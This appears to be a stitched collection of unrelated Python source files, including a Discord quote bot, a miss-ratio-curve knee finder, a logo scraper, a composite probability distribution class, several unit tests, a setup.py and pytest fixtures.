if os.path.isdir(file):
for _file in os.listdir(f'./storage/speeches/{file}'):
self.speech_paths.append(file + _file)
else:
self.speech_paths.append('./speeches/' + file)
@commands.command(aliases=['Quotes'])
@cooldown(1, 10, BucketType.user)
async def quote(self, ctx):
return await ctx.send(embed=discord.Embed(
description=random.choice(words),
colour=discord.Colour.gold()
))
@commands.command(aliases=['VQ', 'ImgQ', 'IQuote'])
@cooldown(1, 15, BucketType.user)
async def imagequote(self, ctx):
return await ctx.send(embed=discord.Embed(
colour=discord.Colour.gold(),
).set_image(url=random.choice(images)))
@commands.command(aliases=['Speeches'])
@cooldown(1, 120, BucketType.user)
async def speech(self, ctx):
return await ctx.send(content='Enjoy this speech to listen to!',
file=discord.File(random.choice(self.speech_paths), filename='speech.mp3'))
def setup(bot):
bot.add_cog(Motivation(bot))
| 2,179 | 718 |
import pandas as pd
from nltk.stem import LancasterStemmer, WordNetLemmatizer
from nltk.tokenize import sent_tokenize, word_tokenize
from curami.commons import file_utils
'''
Match pair of attributes for their base form similarity
Generates matched attribute file by measuring the syntactic similarity between the base form of the two attributes.
Outputs two attributes and similarity score
'''
match_ratio = 0.85
def analyze():
attributes = pd.read_csv(file_utils.matched_attributes_file, encoding=file_utils.encoding)
stemmer = LancasterStemmer()
lemmatizer = WordNetLemmatizer()
matched_attributes = []
for index, row in attributes.iterrows():
# lemmatize
attribute1 = ' '.join(lemmatizer.lemmatize(w) for w in row["ATTRIBUTE_1"].split())
attribute2 = ' '.join(lemmatizer.lemmatize(w) for w in row["ATTRIBUTE_2"].split())
if attribute1 == attribute2:
matched_attributes.append({"ATTRIBUTE_1": row["ATTRIBUTE_1"],
"ATTRIBUTE_2": row["ATTRIBUTE_2"],
"RATIO": 1})
continue
# stem
attribute1 = ' '.join(stemmer.stem(w) for w in row["ATTRIBUTE_1"].split())
attribute2 = ' '.join(stemmer.stem(w) for w in row["ATTRIBUTE_2"].split())
if attribute1 == attribute2:
matched_attributes.append({"ATTRIBUTE_1": row["ATTRIBUTE_1"],
"ATTRIBUTE_2": row["ATTRIBUTE_2"],
"RATIO": 0.8})
pd_matched_attributes = pd.DataFrame(matched_attributes)
pd_matched_attributes = pd_matched_attributes.sort_values(by="RATIO", ascending=False)
pd_matched_attributes.to_csv(
file_utils.word_base_matched_attribute_file, index=False, encoding=file_utils.encoding)
if __name__ == "__main__":
analyze()
| 1,882 | 596 |
# coding: utf-8
__author__ = 'Tyler Estro'
__version__ = '0.1'
__email__ = 'testro@cs.stonybrook.edu'
__status__ = 'Development'
import numpy as np
import logging
import uts.gradient as grad
from uts.zscore import zscore_array
logger = logging.getLogger(__name__)
def map_index(a:np.ndarray, b:np.ndarray) -> np.ndarray:
"""
Maps the knee points into indexes.
Args:
a (np.ndarray): numpy array with the points (x)
b (np.ndarray): numpy array with the knee points points (x)
Returns:
np.ndarray: The knee indexes
"""
sort_idx = np.argsort(a)
out = sort_idx[np.searchsorted(a, b, sorter=sort_idx)]
return out
def knees(points:np.ndarray, dx:float=0.05, dy:float=0.05, dz:float=0.05, x_max:int=None, y_range:list=None) -> np.ndarray:
"""
Given an array of points, it computes the knees.
Args:
points (np.ndarray): numpy array with the points (x, y)
dx (float): % of max cache size between points (default 0.05)
dy (float): % of max - min miss ratio between points (default 0.05)
dz (float): amount we decrease outlier_z every iteration (default 0.05)
x_max (int): max cache size of original (pre-RDP) MRC (default None)
y_max (list): [max, min] miss ratio of original (pre-RDP) MRC (default None)
Returns:
np.ndarray: The knee points on the curve
"""
x = points[:, 0]
rv = getPoints(points, dx, dy, dz, False, x_max, y_range)
# convert x points into indexes:
return map_index(x, np.array(rv))
def getPoints(points: np.ndarray, dx:float=0.05, dy:float=0.05, dz:float=0.05, plot:bool=False, x_max:int=None, y_range:list=None) -> np.ndarray:
"""
Use our outlier method to find interesting points in an MRC.
Args:
points (np.ndarray): numpy array with the points (x, y)
dx (float): % of max cache size between points (default 0.05)
dy (float): % of max - min miss ratio between points (default 0.05)
dz (float): amount we decrease outlier_z every iteration (default 0.05)
plot (bool): set True if you want to return data useful for plotting
x_max (int): max cache size of original (pre-RDP) MRC (default None)
y_max (list): [max, min] miss ratio of original (pre-RDP) MRC (default None)
Returns:
list: list with the knees x coordinate
"""
# in case we use RDP, we need the original MRC x/y ranges: x_max,y_range vars
x_max = x_max if x_max else len(points)
if y_range:
y_max,y_min = y_range
else:
y_max,y_min = (points[:,1].max(),points[:,1].min())
if len(points) < 4:
logger.debug('pointSelector: < 4 unique requests in workload')
return []
if y_min == 1:
logger.debug('pointSelector: workload completely random (dont bother caching)')
return []
# get absolute x and y distances
x_width = max(1, int(x_max * dx))
y_height = (y_max - y_min) * dy
# get z-score
x = points[:, 0]
y = points[:, 1]
yd2 = grad.csd(x, y)
z_yd2 = zscore_array(x, yd2)
min_zscore = min(z_yd2)
# stack the 2nd derivative zscore with the points
points = np.column_stack((points, z_yd2))
# outlier_points holds our final selected points
outlier_points = np.empty((0,2))
# main loop. start with outliers >= 3 z-score
outlier_z = 3
while True:
points_added = 0
# candidate points have a zscore >= outlier_z
candidates = points[points[:,2] >= outlier_z]
#print('Candidates: ' + str(len(candidates)) + ' Points: ' + str(len(points)) + ' Outlier_Points: ' +
# str(len(outlier_points)) + ' Outlier_Z: ' + str(round(outlier_z,3)))
if len(candidates) > 0:
x_diff = np.argwhere(np.diff(candidates, axis=0)[:,0] >= x_width).flatten()
if len(x_diff) == 0:
outlier_best = candidates[np.argmin(candidates[:,1])] # best miss ratio in range
if all(abs(outlier_best[1]-i) >= y_height for i in outlier_points[:,1]):
outlier_points = np.append(outlier_points, [[outlier_best[0], outlier_best[1]]], axis=0)
points = points[np.where(((points[:,0] <= (outlier_best[0] - x_width)) | (points[:,0] >= (outlier_best[0] + x_width))) & \
((points[:,1] <= (outlier_best[1] - y_height)) | (points[:,1] >= (outlier_best[1] + y_height))))]
points_added += 1
else:
candidate_outliers = np.empty((0,3))
x_diff = np.hstack(([0],x_diff,[len(candidates)-1]))
# first create an array of candidate outliers
for i in range(0, len(x_diff)-1):
# points in this form (0, 1) [1,2) ... [n,End)
if i == 0:
x_range = candidates[candidates[:,0] <= candidates[x_diff[i+1]][0]]
else:
x_range = candidates[(candidates[:,0] > candidates[x_diff[i]][0]) & (candidates[:,0] <= candidates[x_diff[i+1]][0])]
outlier_best = x_range[np.argmin(x_range[:,1])] # point with best miss ratio in range
outlier_best_z = x_range[np.argmin(x_range[:,2])][2] # best z-score in range
outlier_best[2] = outlier_best_z
candidate_outliers = np.append(candidate_outliers, [outlier_best], axis=0)
# sort all the candidate outliers by z-score in descending order
candidate_outliers = candidate_outliers[np.argsort(candidate_outliers[:,2])][::-1]
for outlier_best in candidate_outliers:
if all(abs(outlier_best[1]-i) >= y_height for i in outlier_points[:,1]):
outlier_points = np.append(outlier_points, [[outlier_best[0], outlier_best[1]]], axis=0)
points = points[np.where(((points[:,0] <= (outlier_best[0] - x_width)) | (points[:,0] >= (outlier_best[0] + x_width))) & \
((points[:,1] <= (outlier_best[1] - y_height)) | (points[:,1] >= (outlier_best[1] + y_height))))]
points_added += 1
# terminating conditions (i think len(points) == 0 is all we need now)
if len(points) == 0 or ((outlier_z <= min_zscore) and points_added == 0):
break
outlier_z -= dz
# sweep through and points to avoid picking concavity issues
outlier_min_mr = 1.0
# convert to a dict so we can delete in-place
outlier_points = {int(x[0]):x[1] for x in outlier_points}
outlier_keys = list(sorted(outlier_points.keys()))
for k in outlier_keys:
if outlier_points[k] > outlier_min_mr:
del outlier_points[k]
else:
outlier_min_mr = outlier_points[k]
# returns sorted list of cache sizes
if not plot:
#return map_index(points, outlier_points)
return np.array(list(sorted(outlier_points.keys())))
else:
return (outlier_points, z_yd2)
| 7,154 | 2,432 |
from config import settings
import re
class LogoFinderService():
def __init__(self,soup_obj,website_url):
self.soup_obj = soup_obj
self.website_url = website_url
self.scrapping_settings = settings['ScrappingSettings']
def find_logo(self) -> str:
'''returns a list of scrapped logo full paths'''
image_objects = self.soup_obj.find_all('img')
logos = []
for image in image_objects:
image_address = image.get('src')
if image_address != None:
if self.scrapping_settings['LogoTextIdentifier'] in image_address.lower():
logos.append(image_address)
if 'class' in image.attrs:
classnames = image.attrs['class']
for classname in classnames:
if self.scrapping_settings['LogoTextIdentifier'] in classname.lower():
logos.append(image_address)
if len(logos) == 0:
return "NO LOGO FOUND"
logo = logos[0]
regex_item = settings['ScrappingSettings']['AbsoluteVsRelativeRegexChecker']
logo_relative_or_absolute = re.findall(regex_item,logo)
if len(logo_relative_or_absolute) == 0:
logo = self.website_url+logo
if len(logos) >1:
print(f'More than one logo found for:{self.website_url}. The first one was chosen arbitrary.')
logo = f"AMBIGUOUS LOGO: {logo}"
return logo | 1,496 | 424 |
from .schedule import schedule
| 31 | 8 |
import github
def IssueRepo(issue):
return '/'.join(issue.url.split('/')[-4:-2])
def HasLabel(issue, name):
label = next((l for l in issue.get_labels() if l.name == name), None)
return label is not None
def AddLabel(gh, issue, name, create=True):
if HasLabel(issue, name):
return
label = gh.get_label(IssueRepo(issue), name, create=create)
if label is None:
issue.create_comment(
'Sorry! "{}" is not a label yet, and I don\'t create '.format(name)
+ 'labels to avoid spam.'
)
return
issue.add_to_labels(label)
def ObjectType(o):
if isinstance(o, github.Issue.Issue):
return 'issue'
elif isinstance(o, github.Repository.Repository):
return 'repository'
else:
return None
| 796 | 257 |
import sys
def addBinary(a, b):
'return bin(int(a,2)+int(b,2))[2:]'
sumtemp = str(a + b)
sumlist = []
for char in sumtemp:
sumlist.append(int(char))
for i in range(1, len(sumtemp) + 1):
if sumlist[-i] == 0 or sumlist[-i] == 1:
pass
else:
if i + 1 < len(sumtemp) + 1:
if sumlist[-i] == 2:
sumlist[-i] = 0
sumlist[-i - 1] += 1
else:
sumlist[-i] = 1
sumlist[-i - 1] += 1
else:
if sumlist[-i] == 2:
sumlist[-i] = 0
sumlist.insert(0, 1)
else:
sumlist[-i] = 1
sumlist.insert(0, 1)
return "".join(str(x) for x in sumlist)
if __name__ == '__main__':
print(addBinary(int(sys.argv[1]), int(sys.argv[2])))
| 915 | 324 |
import numpy as np
import scipy as sp
from scipy import stats as sps
import scipy.optimize as op
import qp
class composite(object):
def __init__(self, components, vb=True):
"""
A probability distribution that is a linear combination of scipy.stats.rv_continuous objects
Parameters
----------
components: list or tuple, dicts
aggregation of dicts defining component functions and their coefficients
vb: boolean
report on progress to stdout?
Notes
-----
TO DO: change x --> z
"""
self.components = components
self.n_components = len(self.components)
self.component_range = range(self.n_components)
coefficients = np.array([component['coefficient'] for component in self.components])
self.coefficients = coefficients / np.sum(coefficients)
self.functions = np.array([component['function'] for component in self.components])
def pdf(self, xs):
"""
Evaluates the composite PDF at locations
Parameters
----------
xs: float or numpy.ndarray, float
value(s) at which to evaluate the PDF
Returns
-------
ps: float or numpy.ndarray, float
value(s) of the PDF at xs
"""
p = np.zeros(np.shape(xs))
for c in self.component_range:
p += self.coefficients[c] * self.functions[c].pdf(xs)
return p
def cdf(self, xs):
"""
Evaluates the composite CDF at locations
Parameters
----------
xs: float or numpy.ndarray, float
value(s) at which to evaluate the CDF
Returns
-------
ps: float or numpy.ndarray, float
value(s) of the CDF at xs
"""
ps = np.zeros(np.shape(xs))
for c in self.component_range:
ps += self.coefficients[c] * self.functions[c].cdf(xs)
return ps
def rvs(self, size):
"""
Samples the composite probability distribution
Parameters
----------
size: int
number of samples to take
Returns
-------
xs: numpy.ndarray, float
samples from the PDF
"""
groups = np.random.choice(self.component_range, size, p=self.coefficients)
u, counts = np.unique(groups, return_counts=True)
samples = np.empty(0)
for i in range(len(u)):
samples = np.append(samples, self.functions[u[i]].rvs(counts[i]))
return np.array(samples).flatten()
def ppf(self, cdfs, ivals=None):
"""
Evaluates the composite PPF at locations
Parameters
----------
cdfs: float or numpy.ndarray, float
value(s) at which to find quantiles
ivals: float or numpy.ndarray, float
initial guesses for quantiles
Returns
-------
xs: float or numpy.ndarray, float
quantiles
"""
N = np.shape(cdfs)[0]
xs = np.zeros(N)
if ivals is not None:
xs0 = ivals
else:
all_cdfs = np.zeros(N)
for c in self.component_range:
all_cdfs += self.functions[c].ppf(cdfs)
xs0 = all_cdfs / self.n_components
for n in range(N):
def ppf_helper(x):
return np.absolute(cdfs[n] - self.cdf(x))
res = op.minimize(ppf_helper, xs0[n], method="Nelder-Mead", options={"maxfev": 1e5, "maxiter":1e5}, tol=1e-8)
# res = op.basinhopping(ppf_helper, xs0[n])#, method="Nelder-Mead", options={"maxfev": 1e5, "maxiter":1e5})
xs[n] += res.x
# if vb:
# print(res.message, res.success)
return xs
| 3,820 | 1,115 |
# Copyright 2020 The FastEstimator Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import unittest
import tensorflow as tf
import fastestimator as fe
import fastestimator.test.unittest_util as fet
class TestReflectionPadding2D(unittest.TestCase):
def setUp(self):
self.x = tf.reshape(tf.convert_to_tensor(list(range(9))), (1, 3, 3, 1))
def test_reflection_padding_2d_double_side(self):
op = tf.constant([[[[4], [3], [4], [5], [4]], [[1], [0], [1], [2], [1]], [[4], [3], [4], [5], [4]],
[[7], [6], [7], [8], [7]], [[4], [3], [4], [5], [4]]]])
m = fe.layers.tensorflow.ReflectionPadding2D((1, 1))
y = m(self.x)
self.assertTrue(fet.is_equal(y, op))
def test_reflection_padding_2d_single_side(self):
op = tf.constant([[[[1], [0], [1], [2], [1]], [[4], [3], [4], [5], [4]], [[7], [6], [7], [8], [7]]]])
m = fe.layers.tensorflow.ReflectionPadding2D((1, 0))
y = m(self.x)
self.assertTrue(fet.is_equal(y, op))
| 1,628 | 568 |
'''Crie um programa que leia vários números inteiros pelo teclado.
O programa só vai parar quando o usuário digitar o valor 999,
que é a condição de parada. No final, mostre quantos números
foram digitados e qual foi a soma entre eles (desconsiderando o flag). '''
print("Descubra a senha!")
n = cont = soma = 0
n = int(input("Digite um numero: " ))
while n != 999:
cont += 1
soma += n
n = int(input("Digite um numero: " ))
print("Voce digitou {} e a soma total é {} dos numeros digitados.".format(cont,soma))
| 533 | 193 |
# -*- coding: utf-8 -*-
# DO NOT EDIT THIS FILE!
# This file has been autogenerated by dephell <3
# https://github.com/dephell/dephell
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
import os.path
readme = ''
here = os.path.abspath(os.path.dirname(__file__))
readme_path = os.path.join(here, 'README.rst')
if os.path.exists(readme_path):
with open(readme_path, 'rb') as stream:
readme = stream.read().decode('utf8')
setup(
long_description=readme,
name='str2port',
version='0.1.1',
description='Convert string to md5 hash, then to port number. No randomization involved.',
project_urls={
"homepage": "https://github.com/kritarthh/str2port", "repository": "https://github.com/kritarthh/str2port"},
author='Pacharapol Withayasakpunt',
author_email='patarapolw@gmail.com',
license='MIT',
entry_points={"console_scripts": ["str2port = str2port.__main__:cli"]},
packages=['str2port'],
package_dir={"": "."},
package_data={"str2port": ["*.csv"]},
install_requires=['click==7.*,>=7.0.0'],
)
| 1,112 | 404 |
from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^$', views.index, name='index'),
url(r'^login/$', views.login, name='login'),
url(r'^logout/$', views.logout, name='logout'),
url(r'^update/$', views.update, name='update'),
url(r'^update-password/$', views.update_password, name='update-password'),
url(r'^recipes/$', views.recipes, name='recipes'),
url(r'^signup/$', views.signup, name='signup'),
url(r'^favourites/$', views.favourites, name='recipes'),
]
| 516 | 190 |
from tensorflow_probability import edward2 as ed
import tensorflow as tf
import pytest
import pymc4 as pm
from pymc4.model.base import Config
# pylint: disable=unused-variable, unused-argument
# pylint: disable-msg=E0102
def test_model_definition_type1():
model = pm.Model(name="testName")
@model.define
def simple(cfg):
ed.Normal(0., 1., name='normal')
assert 'normal' in model.variables
assert [] == model.variables['normal'].shape.as_list()
assert model.name == "testName"
def test_model_definition_type2():
with pytest.raises(KeyError) as e:
@pm.inline
def model(cfg):
ed.Normal(0., 1., name='normal', sample_shape=cfg.shape_for_normal)
assert e.match('you probably need to pass "shape_for_normal" in model definition')
@pm.inline(shape_for_normal=(10,)) # pylint: disable-msg=E1120
def model(cfg):
ed.Normal(0., 1., name='normal', sample_shape=cfg.shape_for_normal)
assert 'normal' in model.variables
assert [10] == model.variables['normal'].shape.as_list()
def test_model_reconfigure():
@pm.inline(shape_for_normal=(10,)) # pylint: disable-msg=E1120
def model(cfg):
ed.Normal(0., 1., name='normal', sample_shape=cfg.shape_for_normal)
assert 'normal' in model.variables
assert [10] == model.variables['normal'].shape.as_list()
model.configure(shape_for_normal=3)
assert [3] == model.variables['normal'].shape.as_list()
def test_testvalue():
@pm.inline
def model(cfg):
ed.Normal(0., 1., name='normal')
testval_random = model.test_point()
testval_mode = model.test_point(sample=False)
assert testval_mode['normal'] == 0.
assert testval_mode['normal'] != testval_random['normal']
def test_variables():
model = pm.Model()
@model.define
def simple(cfg):
ed.Normal(0., 1., name='normal')
assert len(model.variables) == 1
assert len(model.unobserved) == 1
assert "normal" in model.variables
def test_model_target_log_prob_fn():
model = pm.Model()
@model.define
def simple(cfg):
ed.Normal(0., 1., name='normal')
model.target_log_prob_fn()
def test_model_observe():
model = pm.Model()
@model.define
def simple(cfg):
ed.Normal(0., 1., name='normal')
model.observe(normal=1)
assert len(model.observed) == 1
assert not model.unobserved
def test_model_reset():
model = pm.Model()
@model.define
def simple(cfg):
ed.Normal(0., 1., name='normal')
model.observe(normal=1)
assert len(model.observed) == 1
assert not model.unobserved
model.reset()
assert not model.observed
assert len(model.unobserved) == 1
def test_model_session():
model = pm.Model()
@model.define
def simple(cfg):
ed.Normal(0., 1., name='normal')
assert isinstance(model.session, tf.Session)
def test_model_config():
model = pm.Model()
assert model.cfg == {}
model = pm.Model(var1=123)
@model.define
def simple(cfg):
assert cfg["var1"] == 123
model = pm.Model(var1=123)
@model.define
def simple(cfg):
pass
model = model.configure(var1=12)
@model.define
def simple(cfg):
assert cfg["var1"] == 12
def test_model_log_prob_fn():
model = pm.Model()
@model.define
def simple(cfg):
mu = ed.Normal(0., 1., name="mu")
log_prob_fn = model.target_log_prob_fn()
with tf.Session():
assert -0.91893853 == pytest.approx(log_prob_fn(0).eval(), 0.00001)
| 3,564 | 1,276 |
"""
Global fixtures to be reused.
"""
from __future__ import absolute_import
import sys
import mock
import pytest
import test.common as tc
@pytest.fixture(scope='session', autouse=True)
def setup_test_bed(request):
"""
Fixture sets up the testing environment for this web application.
Session scope, executes before all tests.
"""
request.addfinalizer(tc.env_teardown)
tc.env_setup()
@pytest.yield_fixture()
def mock_print():
"""
A fixture that mocks python's print function during test.
"""
if sys.version_info < (3, 0):
print_mod = '__builtin__.print'
else:
print_mod = 'builtins.print'
with mock.patch(print_mod) as mock_obj:
yield mock_obj
@pytest.yield_fixture()
def mock_input():
"""
A fixture that mocks python's print function during test.
"""
if sys.version_info < (3, 0):
input_mod = '__builtin__.raw_input'
else:
input_mod = 'builtins.input'
with mock.patch(input_mod) as mock_obj:
yield mock_obj
# @pytest.yield_fixture(scope='function', autouse=True)
# def around_all_tests():
# """
# Executes before and after EVERY test.
# Can be helpful for tracking bugs impacting test bed.
# """
# # before
# yield
# # after
| 1,285 | 429 |